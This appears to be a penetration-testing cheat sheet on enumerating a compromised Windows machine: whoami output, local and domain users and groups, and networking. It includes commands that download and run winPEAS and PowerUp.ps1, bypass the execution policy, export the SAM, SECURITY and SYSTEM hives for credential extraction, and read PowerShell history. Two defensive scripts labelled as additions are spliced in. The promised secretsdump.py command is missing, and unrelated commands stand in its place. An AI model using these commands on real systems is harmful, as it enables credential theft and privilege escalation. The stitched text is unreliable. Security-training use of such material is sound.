Get information about a compromised machine to find possible ways to escalate privileges
For enumeration of network protocols like SMB, RPC, or LDAP, see Enumeration.
Users
Users are important to understand on a computer or domain because they might have different or higher permissions than your current user. By understanding exactly how the users relate to each other and how privileges can be abused, you can quickly escalate privileges to reach the crown jewels.
For domain users/groups, BloodHound can enumerate and analyze all the connections between them for a better understanding, and possible privilege escalation methods.
Current User
The whoami command can tell you what user you are running as, as well as some more detailed information about privileges and groups, using the /all flag:
whoami /all
First comes the username and its SID. The part before the \ tells you where the user comes from. If this is the same as the output of the hostname command, it is a local user on that computer.
USER INFORMATION
----------------

User Name        SID
================ ==============================================
WORKSTATION\user S-1-5-21-5386719015-7638691639-2457330780-1001
Next is the group information containing all the groups you are in. Some default ones you will always find here, but others have interesting properties, like BUILTIN\Remote Desktop Users, which allows logging in via RDP (port 3389), or custom groups, which have a long SID.
You will also always find the Mandatory Label\..., called "Integrity level". It is used as a base for what actions you can and can't do. It may have one of the following values:
System: SYSTEM (kernel, ...)
High: Elevated users (Administrators, with "Run as Administrator")
Medium: Standard users (default, most often seen)
Low: Restricted rights often used in sandboxed processes or for directories storing temporary data
Untrusted: Lowest integrity level with extremely limited access rights for processes or objects that pose the most potential risk
GROUP INFORMATION
-----------------

Group Name                           Type             SID                                            Attributes
==================================== ================ ============================================== ==================================================
Everyone                             Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
WORKSTATION\group                    Alias            S-1-5-21-5386719015-7638691639-2457330780-1008 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users         Alias            S-1-5-32-555                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                   Well-known group S-1-5-3                                        Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288
Lastly, there are the Privileges, each of which grants one specific right to the holder of the token. Some privileges, like SeImpersonatePrivilege, can be abused.
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeSecurityPrivilege Manage auditing and security log Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
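As an added example (not part of the original page), the PowerShell function below summarises the three token attributes the whoami /all walkthrough above singles out: the integrity level, membership in sensitive built-in groups, and sensitive privileges. It matches on well-known SIDs rather than display names, so it is independent of the system language; the lists of sensitive groups and privileges are my selection, not the page's.

```powershell
# Added example, not from the page: triage the current token the way the
# whoami /all walkthrough does, matching on SIDs instead of display names.
function Get-TokenRiskReport {
    # /fo csv makes whoami emit one well-formed CSV table per query; keep only CSV rows
    $groups = whoami /groups /fo csv | Where-Object { $_ -match '^"' } | ConvertFrom-Csv
    $privs  = whoami /priv   /fo csv | Where-Object { $_ -match '^"' } | ConvertFrom-Csv

    # Mandatory Label SIDs are S-1-16-<RID>; the RID encodes the integrity level
    $levels = @{ '16384' = 'System'; '12288' = 'High'; '8192' = 'Medium'; '4096' = 'Low'; '0' = 'Untrusted' }
    $label  = $groups | Where-Object { $_.SID -like 'S-1-16-*' } | Select-Object -First 1
    $rid    = if ($label) { ($label.SID -split '-')[-1] } else { '' }
    $level  = if ($levels.ContainsKey($rid)) { $levels[$rid] } else { "Unknown (S-1-16-$rid)" }

    # Built-in groups whose membership widens what this account can reach (well-known SIDs)
    $sensitiveGroups = @{
        'S-1-5-32-544' = 'Administrators'
        'S-1-5-32-551' = 'Backup Operators'
        'S-1-5-32-555' = 'Remote Desktop Users'
        'S-1-5-32-580' = 'Remote Management Users'
    }
    $groupHits = foreach ($g in $groups) {
        if ($sensitiveGroups.ContainsKey($g.SID)) { '{0} ({1})' -f $sensitiveGroups[$g.SID], $g.SID }
    }

    # Privileges worth reviewing on any account that holds them. A "Disabled" state is
    # not protection: the holder can enable its own privileges at any time.
    $sensitivePrivs = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeDebugPrivilege',
                      'SeBackupPrivilege', 'SeRestorePrivilege', 'SeTakeOwnershipPrivilege', 'SeLoadDriverPrivilege'
    $privHits = $privs | Where-Object { $sensitivePrivs -contains $_.'Privilege Name' } |
        ForEach-Object { '{0} ({1})' -f $_.'Privilege Name', $_.State }

    [pscustomobject]@{
        User                = (whoami)
        IntegrityLevel      = $level
        SensitiveGroups     = @($groupHits)
        SensitivePrivileges = @($privHits)
    }
}

Get-TokenRiskReport | Format-List
```

Empty SensitiveGroups and SensitivePrivileges lists mean the token carries none of the listed attributes; a Medium integrity level with no hits is the expected picture for a standard user.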
Local Users/Groups
While looking at our own user is interesting, we should be looking at how we attack other users, and exactly who to attack. To get all local users on a computer, use Get-LocalUser in PowerShell:
PS C:\> Get-LocalUser

Name               Enabled Description
----               ------- -----------
Administrator      False   Built-in account for administering the computer/domain
user               True
DefaultAccount     False   A user account managed by the system.
Guest              False   Built-in account for guest access to the computer/domain
WDAGUtilityAccount False   A user account managed and used by the system for Windows Defender Application Guard scen...
Users may be part of multiple groups. There are many default groups Windows uses, but custom ones can be made too. We can list them using Get-LocalGroup in PowerShell:
PS C:\> Get-LocalGroup

Name                                Description
----                                -----------
group
Access Control Assistance Operators Members of this group can remotely query authorization attributes and permission...
Administrators                      Administrators have complete and unrestricted access to the computer/domain
Backup Operators                    Backup Operators can override security restrictions for the sole purpose of back...
Cryptographic Operators             Members are authorized to perform cryptographic operations.
Device Owners                       Members of this group can change system-wide settings.
Distributed COM Users               Members are allowed to launch, activate and use Distributed COM objects on this ...
Event Log Readers                   Members of this group can read event logs from local machine
Guests                              Guests have the same access as members of the Users group by default, except for...
Hyper-V Administrators              Members of this group have complete and unrestricted access to all features of H...
IIS_IUSRS                           Built-in group used by Internet Information Services.
Network Configuration Operators     Members in this group can have some administrative privileges to manage configur...
Performance Log Users               Members of this group may schedule logging of performance counters, enable trace...
Performance Monitor Users           Members of this group can access performance counter data locally and remotely
Power Users                         Power Users are included for backwards compatibility and possess limited adminis...
Remote Desktop Users                Members in this group are granted the right to logon remotely
Remote Management Users             Members of this group can access WMI resources over management protocols (such a...
Replicator                          Supports file replication in a domain
System Managed Accounts Group       Members of this group are managed by the system.
Users                               Users are prevented from making accidental or intentional system-wide changes an...
Lastly, to learn who are the members of a group, we can use Get-LocalGroupMember:
PS C:\> Get-LocalGroupMember group
ObjectClass Name PrincipalSource
----------- ---- ---------------
User WORKSTATION\user Local
Tip: Requesting this for the Administrators group tells you who to target!
Domain Users/Groups
Local users/groups only work on one computer, but domain users/groups work on all domain-joined computers. To list all domain users, use the net user command with the /domain flag:
PS C:\> net user /domain
User accounts for \\DC1.corp.com

-------------------------------------------------------------------------------
Administrator            user1                    Guest
user2                    admin1                   admin2
krbtgt
There you find some default users like Administrator, Guest, and krbtgt, but also all other users on the domain. To get more detailed information about one user, include their name in the command:
PS C:\> net user "admin1" /domain
User name                    admin1
Full Name
Comment
User's comment
...

Local Group Memberships
Global Group memberships     *Domain Users         *Domain Admins
These users can also be part of groups, which you can list. There are several default groups all with their own special group policies saying what they can and can't do. List them with net group:
PS C:\> net group /domain
Group Accounts for \\DC1.corp.com

-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*Debug
*Development
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
If we want to learn more about a custom group, or just see who is a member of the group, we can also include that group name in the command:
PS C:\> net group "Development" /domain
Group name     Development
Comment

Members

-------------------------------------------------------------------------------
user2
Useful Commands
This section contains a set of useful commands for CMD or PowerShell that you'll often look for while enumerating a compromised machine.
WinPEAS / PowerUp.ps1
Before doing manual enumeration, getting an idea of the system through automated means might be quicker. The WinPEAS script is a Windows equivalent to the well-known LinPEAS script for Linux. It enumerates many common misconfigurations in the system and tries to find vulnerabilities. This generates a lot of output to sift through, but it is a very useful output that normally would require a ton of manual work.
To run it, download the latest winPEASany.exe from the Releases page, or serve it from a local HTTP server if your target cannot access the public internet:
Run WinPEAS
cd /Windows/Tasks  # world-writable directory
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe -OutFile winPEASany.exe
.\winPEASany.exe | Tee-Object winPEAS.txt  # write output to a file (may take long)
Another such tool is PowerUp.ps1 which looks for more directly exploitable vulnerabilities and has commands to automatically exploit them too:
Run PowerUp.ps1
wget https://github.com/PowerShellMafia/PowerSploit/raw/master/Privesc/PowerUp.ps1 -OutFile PowerUp.ps1
# It is a module, and to import it we need to disable the execution policy
powershell -ep bypass
. .\PowerUp.ps1
# Now that it is imported into the current shell, we can run its commands
Invoke-PrivescAudit
Networking
nc -v $IP $PORT
Test-NetConnection -Port 22 10.10.10.10
nmap -p $PORTS $IP
1..1024|% {echo ((New-Object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "TCP port $_ is open"} 2>$null
↳ The above loop is very slow because it goes through ports one by one with a timeout
wmic logicaldisk get deviceid,volumename,description
Stealing SAM / SYSTEM files
One interesting location to check is C:\Windows\System32\config\, where normally only administrators should be able to read contents. Permissions may be misconfigured or you may find the same files backed up in another readable place, but these should be interesting:
SAM - stores local cached credentials, known as SAM secrets
SECURITY - stores domain cached credentials, known as LSA secrets
SYSTEM - contains information to decrypt both SAM and LSA secrets above
On a running system, you often cannot copy these files directly because they are in use. With backups, this is not the case, but on a running system you can use reg to export them live:
Export from live system
reg save HKLM\SAM "C:\Windows\Temp\SAM"
reg save HKLM\SECURITY "C:\Windows\Temp\SECURITY"
reg save HKLM\SYSTEM "C:\Windows\Temp\SYSTEM"
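As an added defender-side check (not part of the original page), the PowerShell function below verifies that the three hive files described above are not readable by broad principals such as Everyone, Users or Authenticated Users. It assumes it runs elevated, since reading the files' security descriptors requires administrator rights, and it accepts extra paths so suspected backup copies can be checked the same way.

```powershell
# Added example, not from the page: report ACEs that let non-administrators read
# the SAM, SECURITY and SYSTEM hive files (or any other path you pass in).
function Test-HiveFileAcl {
    param(
        [string[]] $Path = @(
            "$env:SystemRoot\System32\config\SAM",
            "$env:SystemRoot\System32\config\SECURITY",
            "$env:SystemRoot\System32\config\SYSTEM"
        )
    )
    # Well-known SIDs that should never hold read access on a hive file
    $broad = @{
        'S-1-1-0'      = 'Everyone'
        'S-1-5-11'     = 'Authenticated Users'
        'S-1-5-32-545' = 'Users'
        'S-1-5-4'      = 'INTERACTIVE'
    }
    $readData = [int][System.Security.AccessControl.FileSystemRights]::ReadData
    foreach ($file in $Path) {
        if (-not (Test-Path -LiteralPath $file)) { Write-Warning "$file not found"; continue }
        $acl = Get-Acl -LiteralPath $file
        foreach ($ace in $acl.Access) {
            # Compare by SID so locale-specific display names do not matter
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
            # FullControl, Modify, ReadAndExecute and Read all include the ReadData bit
            $grantsRead = ([int]$ace.FileSystemRights -band $readData) -ne 0
            if ($ace.AccessControlType -eq 'Allow' -and $grantsRead -and $broad.ContainsKey($sid)) {
                [pscustomobject]@{
                    File      = $file
                    Principal = $broad[$sid]
                    Rights    = $ace.FileSystemRights
                    Inherited = $ace.IsInherited
                    Finding   = 'Readable by non-administrators; the hive can be copied and parsed offline'
                }
            }
        }
    }
}

Test-HiveFileAcl | Format-Table -AutoSize
```

No output means no broad read ACE was found on any of the checked files; an Inherited value of True points at the containing directory's ACL as the place to fix.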
When these three files, either copied directly or exported, are copied to your local machine, it is time to extract credentials from them. Using secretsdump.py it is possible to parse the three files like so:
# Show the PowerShell command history of the current user
Get-History
# Raw method below can bypass Clear-History
type (Get-PSReadlineOption).HistorySavePath
# Get verbose script block events (may be large)
Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' -FilterXPath "*[System[EventID=4104]]" | Export-Csv -Path 'ScriptBlockEvents.csv' -NoTypeInformation
# List all services
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
# Start/stop a service if you are allowed
net stop $SERVICE_NAME
net start $SERVICE_NAME